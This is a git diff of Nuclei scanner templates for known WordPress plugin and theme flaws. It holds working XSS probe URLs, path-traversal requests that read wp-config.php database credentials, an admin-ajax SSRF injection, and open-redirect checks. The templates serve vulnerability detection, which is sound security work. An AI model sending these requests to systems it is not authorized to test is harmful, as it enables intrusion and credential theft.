b/nuclei-templates/Other/wp-finder-xss-11449.yaml @@ -0,0 +1,24 @@ +id: wp-finder-xss +info: + name: WordPress Plugin Finder - 'order' Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://www.securityfocus.com/bid/55217/info + tags: wordpress,xss,wp-plugin +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/finder/index.php?by=type&dir=tv&order=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + - type: word + part: header + words: + - text/html + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/wp-flagem-xss-11451.yaml b/nuclei-templates/Other/wp-flagem-xss-11451.yaml deleted file mode 100644 index 90505bc2e4..0000000000 --- a/nuclei-templates/Other/wp-flagem-xss-11451.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: wp-flagem-xss - -info: - name: WordPress Plugin FlagEm - Reflected Cross-Site Scripting (XSS) - author: daffainfo - severity: medium - reference: https://www.exploit-db.com/exploits/38674 - tags: wordpress,xss,wp-plugin - -requests: - - method: GET - path: - - '{{BaseURL}}/wp-content/plugins/FlagEm/flagit.php?cID=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - - matchers-condition: and - matchers: - - type: word - words: - - "" - part: body - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/wp-flagem-xss.yaml b/nuclei-templates/Other/wp-flagem-xss.yaml new file mode 100644 index 0000000000..8866b9f97b --- /dev/null +++ b/nuclei-templates/Other/wp-flagem-xss.yaml @@ -0,0 +1,25 @@ +id: wp-flagem-xss +info: + name: WordPress Plugin FlagEm - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: + - https://www.exploit-db.com/exploits/38674 + tags: wordpress,xss,wp-plugin +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/FlagEm/flagit.php?cID=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + - type: word + part: header + words: + - text/html + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/wp-full-path-disclosure-11457.yaml b/nuclei-templates/Other/wp-full-path-disclosure-11457.yaml deleted file mode 100644 index 47f8740dec..0000000000 --- a/nuclei-templates/Other/wp-full-path-disclosure-11457.yaml +++ /dev/null @@ -1,19 +0,0 @@ -id: wp-full-path-disclosure - -info: - name: Wordpress Full Path Disclosure - author: arcc - severity: info - reference: https://make.wordpress.org/core/handbook/testing/reporting-security-vulnerabilities/#why-are-there-path-disclosures-when-directly-loading-certain-files - tags: debug,wordpress,fpd - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-includes/rss-functions.php" - - matchers: - - type: word - words: - - 'Call to undefined function _deprecated_file()' - part: body diff --git a/nuclei-templates/Other/wp-full-path-disclosure.yaml b/nuclei-templates/Other/wp-full-path-disclosure.yaml new file mode 100644 index 0000000000..2909076981 --- /dev/null +++ b/nuclei-templates/Other/wp-full-path-disclosure.yaml @@ -0,0 +1,18 @@ +id: wp-full-path-disclosure +info: + name: Wordpress - Path Disclosure + author: arcc + severity: info + reference: + - https://make.wordpress.org/core/handbook/testing/reporting-security-vulnerabilities/#why-are-there-path-disclosures-when-directly-loading-certain-files + - https://core.trac.wordpress.org/ticket/38317 + tags: debug,wordpress,fpd +requests: + - method: GET + path: + - "{{BaseURL}}/wp-includes/rss-functions.php" + matchers: + - type: word + words: + - 'Call to undefined function _deprecated_file()' + part: body diff --git a/nuclei-templates/Other/wp-gtranslate-open-redirect-11463.yaml b/nuclei-templates/Other/wp-gtranslate-open-redirect-11463.yaml index 2d9331f914..bd1ff9afa2 100644 --- a/nuclei-templates/Other/wp-gtranslate-open-redirect-11463.yaml +++ b/nuclei-templates/Other/wp-gtranslate-open-redirect-11463.yaml @@ -4,9 +4,8 @@ info: author: dhiyaneshDK severity: medium description: The Translate WordPress with GTranslate WordPress plugin was affected by an Unauthenticated Open Redirect security vulnerability. - reference: - - https://www.pluginvulnerabilities.com/2017/02/17/open-redirect-vulnerability-in-gtranslate/ tags: redirect,wordpress + reference: https://www.pluginvulnerabilities.com/2017/02/17/open-redirect-vulnerability-in-gtranslate/ requests: - method: GET path: @@ -17,6 +16,7 @@ requests: words: - "Location: www.pluginvulnerabilities.com" part: header + - type: status status: - 301 diff --git a/nuclei-templates/Other/wp-idx-broker-platinum-listing-11469.yaml b/nuclei-templates/Other/wp-idx-broker-platinum-listing-11469.yaml new file mode 100644 index 0000000000..bee377c8d3 --- /dev/null +++ b/nuclei-templates/Other/wp-idx-broker-platinum-listing-11469.yaml @@ -0,0 +1,22 @@ +id: wp-idx-broker-platinum-listing +info: + name: WordPress Plugin Idx Broker Platinum Listing + author: pussycat0x + severity: info + description: Searches for sensitive directories present in the wordpress-plugins plugin. + reference: https://www.exploit-db.com/ghdb/6416 + tags: wordpress,listing,plugin +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/idx-broker-platinum/" + matchers-condition: and + matchers: + - type: word + words: + - "Index of" + - "wp-content/plugins/idx-broker-platinum/" + condition: and + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/wp-idx-broker-platinum-listing-11471.yaml b/nuclei-templates/Other/wp-idx-broker-platinum-listing-11471.yaml deleted file mode 100644 index 5612b790af..0000000000 --- a/nuclei-templates/Other/wp-idx-broker-platinum-listing-11471.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: wp-idx-broker-platinum-listing -info: - name: WordPress Plugin Idx Broker Platinum Listing - author: pussycat0x - severity: info - description: Searches for sensitive directories present in the wordpress-plugins plugin. - reference: https://www.exploit-db.com/ghdb/6416 - tags: wordpress,listing,plugin - -requests: - - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/idx-broker-platinum/" - - matchers-condition: and - - matchers: - - type: word - words: - - "Index of" - - "wp-content/plugins/idx-broker-platinum/" - condition: and - - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/wp-install-11473.yaml b/nuclei-templates/Other/wp-install-11473.yaml index e34f2e2637..bf2627bf31 100644 --- a/nuclei-templates/Other/wp-install-11473.yaml +++ b/nuclei-templates/Other/wp-install-11473.yaml @@ -1,15 +1,17 @@ id: wp-install + info: name: WordPress Exposed Installation author: princechaddha severity: high - reference: - - https://smaranchand.com.np/2020/04/misconfigured-wordpress-takeover-to-remote-code-execution/ + reference: https://smaranchand.com.np/2020/04/misconfigured-wordpress-takeover-to-remote-code-execution/ tags: wordpress + requests: - method: GET path: - "{{BaseURL}}/wp-admin/install.php" + matchers-condition: and matchers: - type: word @@ -17,6 +19,7 @@ requests: - "WordPress › Installation" - "Site Title" condition: and + - type: status status: - - 200 + - 200 \ No newline at end of file diff --git a/nuclei-templates/Other/wp-iwp-client-listing-11479.yaml b/nuclei-templates/Other/wp-iwp-client-listing-11476.yaml similarity index 100% rename from nuclei-templates/Other/wp-iwp-client-listing-11479.yaml rename to nuclei-templates/Other/wp-iwp-client-listing-11476.yaml diff --git a/nuclei-templates/Other/wp-javospot-lfi.yaml b/nuclei-templates/Other/wp-javospot-lfi-11480.yaml similarity index 100% rename from nuclei-templates/Other/wp-javospot-lfi.yaml rename to nuclei-templates/Other/wp-javospot-lfi-11480.yaml diff --git a/nuclei-templates/Other/wp-knews-xss-11483.yaml b/nuclei-templates/Other/wp-knews-xss-11483.yaml new file mode 100644 index 0000000000..6fa9a4d0f1 --- /dev/null +++ b/nuclei-templates/Other/wp-knews-xss-11483.yaml @@ -0,0 +1,25 @@ +id: wp-knews-xss +info: + name: WordPress Plugin Knews Multilingual Newsletters - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: + - https://www.securityfocus.com/bid/54330/info + tags: wordpress,xss,wp-plugin +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/knews/wysiwyg/fontpicker/?ff=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + - type: word + part: header + words: + - text/html + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/wp-knews-xss-11488.yaml b/nuclei-templates/Other/wp-knews-xss-11488.yaml deleted file mode 100644 index 31a8055697..0000000000 --- a/nuclei-templates/Other/wp-knews-xss-11488.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: wp-knews-xss -info: - name: WordPress Plugin Knews Multilingual Newsletters - Reflected Cross-Site Scripting (XSS) - author: daffainfo - severity: medium - reference: https://www.securityfocus.com/bid/54330/info - tags: wordpress,xss,wp-plugin -requests: - - method: GET - path: - - '{{BaseURL}}/wp-content/plugins/knews/wysiwyg/fontpicker/?ff=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - matchers-condition: and - matchers: - - type: word - words: - - "" - part: body - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/wp-license-file.yaml b/nuclei-templates/Other/wp-license-file.yaml index 5948f09b55..d5777717de 100644 --- a/nuclei-templates/Other/wp-license-file.yaml +++ b/nuclei-templates/Other/wp-license-file.yaml @@ -3,7 +3,6 @@ info: name: WordPress license file disclosure author: yashgoti severity: info - tags: wordpress requests: - method: GET path: diff --git a/nuclei-templates/Other/wp-mailchimp-log-exposure-11494.yaml b/nuclei-templates/Other/wp-mailchimp-log-exposure-11494.yaml new file mode 100644 index 0000000000..023e18c389 --- /dev/null +++ b/nuclei-templates/Other/wp-mailchimp-log-exposure-11494.yaml @@ -0,0 +1,28 @@ +id: wp-mailchimp-log-exposure + +info: + name: WordPress Mailchimp 4 Debug Log Exposure + author: aashiq + severity: medium + description: Searches for Mailchimp log exposure by attempting to query the debug log endpoint on wp-content + tags: logs,wordpress,exposure,mailchimp + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/uploads/mc4wp-debug.log" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "WARNING: Form" + + - type: word + words: + - 'text/plain' + part: header diff --git a/nuclei-templates/Other/wp-mailchimp-log-exposure.yaml b/nuclei-templates/Other/wp-mailchimp-log-exposure.yaml deleted file mode 100644 index 42ab9af2c0..0000000000 --- a/nuclei-templates/Other/wp-mailchimp-log-exposure.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: wp-mailchimp-log-exposure -info: - name: WordPress Mailchimp 4 Debug Log Exposure - author: aashiq - severity: medium - description: Searches for Mailchimp log exposure by attempting to query the debug log endpoint on wp-content - tags: logs,wordpress,exposure,mailchimp -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/uploads/mc4wp-debug.log" - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - "WARNING: Form" - - type: word - words: - - 'text/plain' - part: header diff --git a/nuclei-templates/Other/wp-memphis-documents-library-lfi-11498.yaml b/nuclei-templates/Other/wp-memphis-documents-library-lfi-11498.yaml index 844d6bf242..991edafc3b 100644 --- a/nuclei-templates/Other/wp-memphis-documents-library-lfi-11498.yaml +++ b/nuclei-templates/Other/wp-memphis-documents-library-lfi-11498.yaml @@ -1,18 +1,21 @@ id: wp-memphis-documents-library-lfi + info: name: WordPress Plugin Memphis Document Library 3.1.5 LFI author: 0x_Akoko severity: high tags: wordpress,wp-plugin,lfi description: Arbitrary file download in Memphis Document Library 3.1.5 - reference: | + reference: - https://www.exploit-db.com/exploits/39593 - https://wpscan.com/vulnerability/53999c06-05ca-44f1-b713-1e4d6b4a3f9f + requests: - method: GET path: - '{{BaseURL}}/mdocs-posts/?mdocs-img-preview=../../../wp-config.php' - '{{BaseURL}}/?mdocs-img-preview=../../../wp-config.php' + matchers-condition: and matchers: - type: word @@ -21,6 +24,7 @@ requests: - "DB_PASSWORD" part: body condition: and + - type: status status: - 200 diff --git a/nuclei-templates/Other/wp-mstore-plugin-listing-11501.yaml b/nuclei-templates/Other/wp-mstore-plugin-listing-11500.yaml similarity index 100% rename from nuclei-templates/Other/wp-mstore-plugin-listing-11501.yaml rename to nuclei-templates/Other/wp-mstore-plugin-listing-11500.yaml diff --git a/nuclei-templates/Other/wp-multiple-theme-ssrf-11513.yaml b/nuclei-templates/Other/wp-multiple-theme-ssrf-11513.yaml new file mode 100644 index 0000000000..4fe1fb2f7a --- /dev/null +++ b/nuclei-templates/Other/wp-multiple-theme-ssrf-11513.yaml @@ -0,0 +1,31 @@ +id: wp-multiple-theme-ssrf + +info: + name: WordPress Multiple Themes - Unauthenticated Function Injection + author: madrobot + severity: high + tags: wordpress,rce,ssrf + reference: + - https://www.exploit-db.com/exploits/49327 + - https://wpscan.com/vulnerability/10417 + +requests: + - raw: + - | + POST /wp-admin/admin-ajax.php?action=action_name HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + + action=epsilon_framework_ajax_action&args%5Baction%5D%5B%5D=Requests&args%5Baction%5D%5B%5D=request_multiple&args%5Bargs%5D%5B0%5D%5Burl%5D=http://example.com + + matchers-condition: and + matchers: + - type: word + words: + - "Example Domain" + - "protocol_version" + part: body + + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/wp-multiple-theme-ssrf.yaml b/nuclei-templates/Other/wp-multiple-theme-ssrf.yaml deleted file mode 100644 index eb1b7bc7db..0000000000 --- a/nuclei-templates/Other/wp-multiple-theme-ssrf.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: wp-multiple-theme-ssrf -info: - name: WordPress Multiple Themes - Unauthenticated Function Injection - author: madrobot - severity: high - reference: - - https://www.exploit-db.com/exploits/49327 - - https://wpscan.com/vulnerability/10417 - tags: wordpress,rce,ssrf -requests: - - raw: - - | - POST /wp-admin/admin-ajax.php?action=action_name HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - - action=epsilon_framework_ajax_action&args%5Baction%5D%5B%5D=Requests&args%5Baction%5D%5B%5D=request_multiple&args%5Bargs%5D%5B0%5D%5Burl%5D=http://example.com - matchers-condition: and - matchers: - - type: word - words: - - "Example Domain" - - "protocol_version" - part: body - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/wp-nextgen-xss-11516.yaml b/nuclei-templates/Other/wp-nextgen-xss-11516.yaml deleted file mode 100644 index a91847e2b8..0000000000 --- a/nuclei-templates/Other/wp-nextgen-xss-11516.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: wp-nextgen-xss -info: - name: WordPress Plugin NextGEN Gallery 1.9.10 - Reflected Cross-Site Scripting (XSS) - author: daffainfo - severity: medium - reference: - - http://web.archive.org/web/20210123110617/https://www.securityfocus.com/bid/57200/info - tags: wordpress,xss,wp-plugin -requests: - - method: GET - path: - - '{{BaseURL}}/wp-content/plugins/nextgen-gallery/nggallery.php?test-head=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - matchers-condition: and - matchers: - - type: word - words: - - "" - part: body - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/wp-nextgen-xss-11517.yaml b/nuclei-templates/Other/wp-nextgen-xss-11517.yaml new file mode 100644 index 0000000000..b6dd8865a7 --- /dev/null +++ b/nuclei-templates/Other/wp-nextgen-xss-11517.yaml @@ -0,0 +1,30 @@ +id: wp-nextgen-xss + +info: + name: WordPress Plugin NextGEN Gallery 1.9.10 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: + - https://www.securityfocus.com/bid/57200/info + tags: wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/nextgen-gallery/nggallery.php?test-head=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/wp-oxygen-theme-lfi-11519.yaml b/nuclei-templates/Other/wp-oxygen-theme-lfi-11519.yaml new file mode 100644 index 0000000000..e4cb6515af --- /dev/null +++ b/nuclei-templates/Other/wp-oxygen-theme-lfi-11519.yaml @@ -0,0 +1,27 @@ +id: wp-oxygen-theme-lfi + +info: + name: WordPress Oxygen-Theme Themes LFI + author: 0x_Akoko + severity: high + description: The WordPress Oxygen-Theme has a local file inclusion vulnerability in its 'download.php' and 'file' parameter. + tags: wordpress,wp-theme,lfi + reference: https://cxsecurity.com/issue/WLB-2019030178 + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/themes/oxygen-theme/download.php?file=../../../wp-config.php' + + matchers-condition: and + matchers: + - type: word + words: + - "DB_NAME" + - "DB_PASSWORD" + part: body + condition: and + + - type: status + status: + - 200 \ No newline at end of file diff --git a/nuclei-templates/Other/wp-oxygen-theme-lfi-11523.yaml b/nuclei-templates/Other/wp-oxygen-theme-lfi-11523.yaml deleted file mode 100644 index 903bb5679d..0000000000 --- a/nuclei-templates/Other/wp-oxygen-theme-lfi-11523.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: wp-oxygen-theme-lfi -info: - name: WordPress Oxygen-Theme - Local File Inclusion - author: 0x_Akoko - severity: high - description: WordPress Oxygen-Theme has a local file inclusion vulnerability via the 'file' parameter of 'download.php'. - reference: - - https://cxsecurity.com/issue/WLB-2019030178 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cwe-id: CWE-22 - tags: wordpress,wp-theme,lfi -requests: - - method: GET - path: - - '{{BaseURL}}/wp-content/themes/oxygen-theme/download.php?file=../../../wp-config.php' - matchers-condition: and - matchers: - - type: word - words: - - "DB_NAME" - - "DB_PASSWORD" - part: body - condition: and - - type: status - status: - - 200 - -# Enhanced by mp on 2022/07/29 diff --git a/nuclei-templates/Other/wp-phpfreechat-xss-11525.yaml b/nuclei-templates/Other/wp-phpfreechat-xss-11525.yaml new file mode 100644 index 0000000000..077f6e51e9 --- /dev/null +++ b/nuclei-templates/Other/wp-phpfreechat-xss-11525.yaml @@ -0,0 +1,24 @@ +id: wp-phpfreechat-xss +info: + name: WordPress Plugin PHPFreeChat - 'url' Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://www.securityfocus.com/bid/54332/info + tags: wordpress,xss,wp-plugin +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/phpfreechat/lib/csstidy-1.2/css_optimiser.php?url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + - type: word + part: header + words: + - text/html + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/wp-phpfreechat-xss-11528.yaml b/nuclei-templates/Other/wp-phpfreechat-xss-11528.yaml deleted file mode 100644 index 24ca07abfb..0000000000 --- a/nuclei-templates/Other/wp-phpfreechat-xss-11528.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: wp-phpfreechat-xss -info: - name: WordPress Plugin PHPFreeChat - 'url' Reflected Cross-Site Scripting (XSS) - author: daffainfo - severity: medium - reference: - - https://www.securityfocus.com/bid/54332/info - tags: wordpress,xss,wp-plugin -requests: - - method: GET - path: - - '{{BaseURL}}/wp-content/plugins/phpfreechat/lib/csstidy-1.2/css_optimiser.php?url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - matchers-condition: and - matchers: - - type: word - words: - - "" - part: body - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/wp-plugin-1-flashgallery-listing-11531.yaml b/nuclei-templates/Other/wp-plugin-1-flashgallery-listing-11531.yaml index b68ebad355..337e6f2106 100644 --- a/nuclei-templates/Other/wp-plugin-1-flashgallery-listing-11531.yaml +++ b/nuclei-templates/Other/wp-plugin-1-flashgallery-listing-11531.yaml @@ -1,20 +1,16 @@ id: wp-plugin-1-flashgallery-listing - info: name: WordPress 1 flash gallery listing author: pussycat0x - severity: info + severity: low description: Searches for sensitive directories present in the wordpress-plugins plugin. reference: https://www.exploit-db.com/ghdb/6978 tags: wordpress,listing - requests: - method: GET path: - "{{BaseURL}}/wp-content/plugins/1-flash-gallery/" - "{{BaseURL}}/blog/wp-content/plugins/1-flash-gallery/" - - stop-at-first-match: true matchers-condition: and matchers: - type: word @@ -22,7 +18,6 @@ requests: - "Index of" - "/wp-content/plugins/1-flash-gallery" condition: and - - type: status status: - 200 diff --git a/nuclei-templates/Other/wp-plugin-marmoset-viewer-xss.yaml b/nuclei-templates/Other/wp-plugin-marmoset-viewer-xss-11538.yaml similarity index 100% rename from nuclei-templates/Other/wp-plugin-marmoset-viewer-xss.yaml rename to nuclei-templates/Other/wp-plugin-marmoset-viewer-xss-11538.yaml diff --git a/nuclei-templates/Other/wp-plugin-utlimate-member-11542.yaml b/nuclei-templates/Other/wp-plugin-utlimate-member-11539.yaml similarity index 100% rename from nuclei-templates/Other/wp-plugin-utlimate-member-11542.yaml rename to nuclei-templates/Other/wp-plugin-utlimate-member-11539.yaml diff --git a/nuclei-templates/Other/wp-popup-listing-11543.yaml b/nuclei-templates/Other/wp-popup-listing-11545.yaml similarity index 100% rename from nuclei-templates/Other/wp-popup-listing-11543.yaml rename to nuclei-templates/Other/wp-popup-listing-11545.yaml diff --git a/nuclei-templates/Other/wp-prostore-open-redirect-11546.yaml b/nuclei-templates/Other/wp-prostore-open-redirect-11546.yaml new file mode 100644 index 0000000000..9916d6c3f2 --- /dev/null +++ b/nuclei-templates/Other/wp-prostore-open-redirect-11546.yaml @@ -0,0 +1,20 @@ +id: wp-prostore-open-redirect + +info: + name: WordPress ProStore Themes 1.1.2 Open Redirection + author: 0x_Akoko + description: The prostore WordPress theme was affected by an Open Redirection security vulnerability. + reference: https://wpscan.com/vulnerability/2e0f8b7f-96eb-443c-a553-550e42ec67dc + severity: low + tags: wordpress,wp-theme,redirect + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/themes/prostore/go.php?https://example.com/" + + matchers: + - type: regex + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' + part: header \ No newline at end of file diff --git a/nuclei-templates/Other/wp-prostore-open-redirect-11549.yaml b/nuclei-templates/Other/wp-prostore-open-redirect-11549.yaml deleted file mode 100644 index 5d31d50aae..0000000000 --- a/nuclei-templates/Other/wp-prostore-open-redirect-11549.yaml +++ /dev/null @@ -1,17 +0,0 @@ -id: wp-prostore-open-redirect -info: - name: WordPress ProStore Themes 1.1.2 Open Redirection - author: 0x_Akoko - description: The prostore WordPress theme was affected by an Open Redirection security vulnerability. - reference: https://wpscan.com/vulnerability/2e0f8b7f-96eb-443c-a553-550e42ec67dc - severity: low - tags: wordpress,wp-theme,redirect -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/themes/prostore/go.php?https://example.com/" - matchers: - - type: regex - regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' - part: header diff --git a/nuclei-templates/Other/wp-qards-listing-11551.yaml b/nuclei-templates/Other/wp-qards-listing-11551.yaml deleted file mode 100644 index e1c84b21a6..0000000000 --- a/nuclei-templates/Other/wp-qards-listing-11551.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: wp-qards-listing - -info: - name: WordPress Plugin Qards - author: pussycat0x - severity: info - description: Searches for sensitive directories present in the wordpress-plugins plugin. - tags: wordpress,listing,wp-plugin,wp - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/qards/" - - matchers-condition: and - matchers: - - type: word - words: - - "Index of" - - "/wp-content/plugins/qards" - condition: and - - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/wp-qards-listing-11552.yaml b/nuclei-templates/Other/wp-qards-listing-11552.yaml new file mode 100644 index 0000000000..0888ca8567 --- /dev/null +++ b/nuclei-templates/Other/wp-qards-listing-11552.yaml @@ -0,0 +1,21 @@ +id: wp-qards-listing +info: + name: WordPress Plugin Qards + author: pussycat0x + severity: info + description: Searches for sensitive directories present in the wordpress-plugins plugin. + tags: wordpress,listing,wp-plugin,wp +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/qards/" + matchers-condition: and + matchers: + - type: word + words: + - "Index of" + - "/wp-content/plugins/qards" + condition: and + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/wp-revslider-file-download-11554.yaml b/nuclei-templates/Other/wp-revslider-file-download-11554.yaml index c823c3c167..d9d2de773a 100644 --- a/nuclei-templates/Other/wp-revslider-file-download-11554.yaml +++ b/nuclei-templates/Other/wp-revslider-file-download-11554.yaml @@ -1,33 +1,29 @@ -id: wp-revslider-file-download - -info: - name: Wordpress Revslider - Unauthenticated Arbitrary File Download - author: pussycat0x - severity: high - description: The Vulnerable Revslider WordPress plugin was affected by an unauthenticated download vulnerability,This could result in attacker downloading the wp-config.php file. - reference: - - https://blog.sucuri.net/2014/09/slider-revolution-plugin-critical-vulnerability-being-exploited.html - - https://cxsecurity.com/issue/WLB-2021090129 - metadata: - google-dork: inurl:/wp-content/plugins/revslider - tags: wordpress,wp-plugin,lfi,revslider - -requests: - - method: GET - path: - - '{{BaseURL}}/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php' - - '{{BaseURL}}/blog/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php' - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "'DB_NAME'" - - "'DB_PASSWORD'" - - "'DB_USER'" - condition: and - - - type: status - status: - - 200 +id: wp-revslider-file-download +info: + name: Wordpress Revslider - Arbitrary File Retrieval + author: pussycat0x + severity: high + description: The Revslider WordPress plugin iss affected by an unauthenticated file retrieval vulnerability, which could result in attacker downloading the wp-config.php file. + reference: + - https://blog.sucuri.net/2014/09/slider-revolution-plugin-critical-vulnerability-being-exploited.html + - https://cxsecurity.com/issue/WLB-2021090129 + metadata: + google-dork: inurl:/wp-content/plugins/revslider + tags: wordpress,wp-plugin,lfi,revslider +requests: + - method: GET + path: + - '{{BaseURL}}/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php' + - '{{BaseURL}}/blog/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php' + matchers-condition: and + matchers: + - type: word + part: body + words: + - "'DB_NAME'" + - "'DB_PASSWORD'" + - "'DB_USER'" + condition: and + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/wp-securimage-xss-11557.yaml b/nuclei-templates/Other/wp-securimage-xss-11557.yaml deleted file mode 100644 index 53a24f1671..0000000000 --- a/nuclei-templates/Other/wp-securimage-xss-11557.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: wp-securimage-xss -info: - name: WordPress Plugin Securimage-WP - 'siwp_test.php' Reflected Cross-Site Scripting (XSS) - author: daffainfo - severity: medium - reference: https://www.securityfocus.com/bid/59816/info - tags: wordpress,xss,wp-plugin -requests: - - method: GET - path: - - '{{BaseURL}}/wp-content/plugins/securimage-wp/siwp_test.php/%22/%3E%3Cscript%3Ealert(1);%3C/script%3E?tested=1' - matchers-condition: and - matchers: - - type: word - words: - - "" - part: body - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/wp-securimage-xss-11560.yaml b/nuclei-templates/Other/wp-securimage-xss-11560.yaml new file mode 100644 index 0000000000..00842e4ba0 --- /dev/null +++ b/nuclei-templates/Other/wp-securimage-xss-11560.yaml @@ -0,0 +1,30 @@ +id: wp-securimage-xss + +info: + name: WordPress Plugin Securimage-WP - 'siwp_test.php' Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: + - https://www.securityfocus.com/bid/59816/info + tags: wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/securimage-wp/siwp_test.php/%22/%3E%3Cscript%3Ealert(1);%3C/script%3E?tested=1' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/wp-security-open-redirect-11561.yaml b/nuclei-templates/Other/wp-security-open-redirect-11561.yaml deleted file mode 100644 index 36ef0f1c04..0000000000 --- a/nuclei-templates/Other/wp-security-open-redirect-11561.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: wp-security-open-redirect - -info: - name: WordPress All-in-One Security <=4.4.1 - Open Redirect - author: akincibor - severity: medium - description: | - WordPress All-in-One Security plugin through 4.4.1 contains an open redirect vulnerability which can expose the actual URL of the hidden login page feature. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. - remediation: Upgrade to 4.4.2 or later. - reference: - - https://wpscan.com/vulnerability/9898 - - https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-all-in-one-wp-security-firewall-open-redirect-4-4-1 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cwe-id: CWE-601 - metadata: - verified: true - max-request: 1 - tags: wp-plugin,redirect,wordpress,wp,wpscan - -http: - - method: GET - path: - - "{{BaseURL}}/?aiowpsec_do_log_out=1&after_logout=https://interact.sh" - - matchers: - - type: regex - part: header - regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 - -# digest: 